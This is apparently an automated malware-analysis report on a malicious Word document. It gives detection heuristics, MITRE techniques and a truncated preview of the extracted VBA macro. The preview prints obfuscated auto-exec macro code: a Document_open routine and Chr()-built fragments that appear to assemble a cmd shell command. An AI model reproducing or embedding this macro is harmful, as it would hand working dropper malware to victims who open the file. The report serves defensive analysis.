MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the Document_open event and utilizes the Shell() function, indicating an intent to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Doc.Malware.Valyria-6615928-0' suggests this is a known malware variant.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6615928-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6615928-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50777 bytes |
SHA-256: b963cc77127ab97eb87aab7307af1a96d0e82ae7f0df93a883b5d7539e2dcd6a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mVdRRUHLPvX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RJoMcswOUaZPTs()
Brmfb = (52045 * SEOTX - 78867 + mWbUdM + (29415 - UHWFb + (rwDMCw - tSqdIf)))
lwPWn = (63613 * JwEiU - 11923 + uIOdc + (46130 - jPnikY + (iKRVX - jsnWQE)))
DCpWc = (94926 * NBMNO - 77349 + fiWwnm + (82489 - NukFVE + (pzoujJ - GtEpii)))
tJisH = (59469 * datjLo - 16917 + jhLtVL + (61961 - qMcwPh + (HsfbOF - MGJjOs)))
ifKUo = (38666 * HHfIQf - 2490 + boDJHa + (78113 - IzKjCV + (NXpTBj - NwDaaC)))
fNllLH = (65109 * OARzc - 43941 + IVzjaF + (22178 - VqCsD + (qVhkoo - kUQWJk)))
OoQFmm = (49953 * pDwpjb - 36077 + cqSrwC + (515 - PFFOo + (rSutO - wMIfjG)))
End Function
Private Sub Document_open()
On Error Resume Next
GwRLz = NdfDSM - udiJw + 75148 * HLhQwz - rATwRk / LNMGuF
FVVvhq = DaFMH - SdwsOW + 69349 * ccjCU - nfmnBc / aizWsB
wMpJbq = rdjDKV - tltMwW + 46570 * SLiSru - VVVuYd / ustBF
uMOdLa = (70912 + lAvhzl / 65031 / 71920 / (BNfQCw - 82099 + 55122 - BkETU - (LHmwB + 83506)))
SzznIICvNjZ = Application.Run("ioIIzrjMOVUw", "" + SbMSUQNkDStBv + PzLWdMG + CVar("c") + hjQSCEhLPVP + hIamjtzrcPwL + KGitp + whinAP + FBGlijClQzi + ZzuqHP + RathznKi + ZjdhTXRzl + XnRAVVK + ozkHIV + DtEjBmn + DLElCQD + SYupAsXjpVP + VAfbAoL + fzpHP + smswiasACpw + hMTnZGpWLJ + fMMCqZ + NKVvsINNA + trLtumT + ojYkODqqnt + QnPfiwTA + jIMwHWZRU + tDdYt + mbpQMDdqQ + ulAitQWNTQY + jHsMzDksi + KipHjb + rfVtT + wXZrCtNJrpvwLj + XBwYAhRfo)
dNLtYa = (60752 + ZUnGfU / 34782 / 5416 / (HstKi - 9163 + 50026 - ztRYAF - (bJWNj + 80309)))
wjkjzz = (63707 + fWzaT / 76845 / 51875 / (iZIAa - 91428 + 67076 - qEowPF - (ChBPaH + 12012)))
End Sub
Function fjnXSKjFXhBnh()
JYanit = (88095 + IObmV / 92149 / 48258 / (WIlKKz - 3380 + 18756 - pQhsEp - (TcKNNw + 73693)))
jMYZbf = (28509 + fkpNRh / 19722 / 43420 / (rpcMW - 7241 + 49271 - SslLla - (wjimd + 69114)))
TzwYj = (71813 + JhoqL / 92081 / 84122 / (YSNYSH - 96282 + 56789 - kzUUo - (TCKiqP + 20465)))
jmwlm = (85192 + CCVIc / 85192 / 28772 / (lKNJM - 75055 + 21274 - pnIfV - (hBTqY + 23286)))
ZSfFU = (78764 + JqavX / 21944 / 76682 / (vVTloj - 32189 + 64778 - uUnAN - (KNiGw + 98210)))
End Function
Function EYuSnWMjMa()
jcjoC = (58580 + NjtAn / 89903 / 26571 / (XIHFdb - 48030 + 48050 - jhkPTO - (uBEzCH + 25877)))
WiiEj = (54001 + zpmLIz / 32716 / 19923 / (lOzAs - 42969 + 97960 - Hwpktm - (pAUYvo + 99904)))
pDIUX = (90427 + aiGnz / 31838 / 10399 / (airvd - 37020 + 7815 - LTfYai - (IzPXSQ + 71056)))
llMkY = (81917 + bvvTNT / 36431 / 95996 / (DqIUt - 4307 + 88907 - HFmqP - (Qumlrp + 23519)))
ZdiKrA = (61579 + JAOit / 30372 / 95993 / (jilwib - 71 + 1766 - AwJEGA - (AUlYu + 18437)))
DovIl = (31941 + hNMYOP / 58821 / 42529 / (ESKCdU - 11957 + 18883 - Hobji - (aFKYV + 52997)))
dEfaR = (6753 + KHaon / 81052 / 12591 / (zdhfq - 2914 + 43409 - CzsiZi - (pZTbU + 49290)))
End Function
Attribute VB_Name = "tNUzWBv"
Function KGitp()
On Error Resume Next
URwRr = 73917 / Nwkrq - OnLtVB / FAuJmL
sKEjs = (hszUBZ * obnVKS / (IFwLK - obsFKP - 25841 * lAJhS))
oBDFWhsn = CStr(Chr(lwrBKaXuAQzGI + vHKFsJtd + 109 + WBHoMipYzXJIqW + bTfIGUlfwCvqR)) + "d /" + CStr(Chr(UqFoZQFoiJhLG + RoUBiZzspBQb + 99 + nzHPfoRl + aVfzwYJf)) + " " + "^F" + "Or " + "; , " + "/" + "^f " + " , " + CStr(Chr(lHWQzRWw + IoPiuKavaJVf + 34 + aMuAtRsl + YjdrQOSTVuD)) + " t"
fjiRnU = 92532 / vbazLA - zirGY / NbwFlN
dnsuBn = 76886 / tSETO - VTZjJz / QMRYJT
HrDhjSqoYi = "okens=" + " " + "2 de" + "li" + CStr(Chr(ACowNEY + AOpmXWE + 109 + XulGOhjfMrBKLE + tzFSijVn)) + "s=Q" + "=f0" + "o" + CStr(Chr(PBdrvPXAfqU + GPisjpvpJAjdZ + 34 + QqZzmiShBUv + LYzlzJwDvoow)) + " ;" + " %" + CStr(Chr(FBzOWPrjoRWHF + jXkCIdkCudPA + 99 + CkzOrNjEGZ + bjjPrDKVOQEvPM))
jMBGU = 46238 / jGiwm - XcQjz / jTPHH
sURMN = 74361 / CbZZT - IiwdPJ / uSNwz
HbZGT = 28413 / i
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.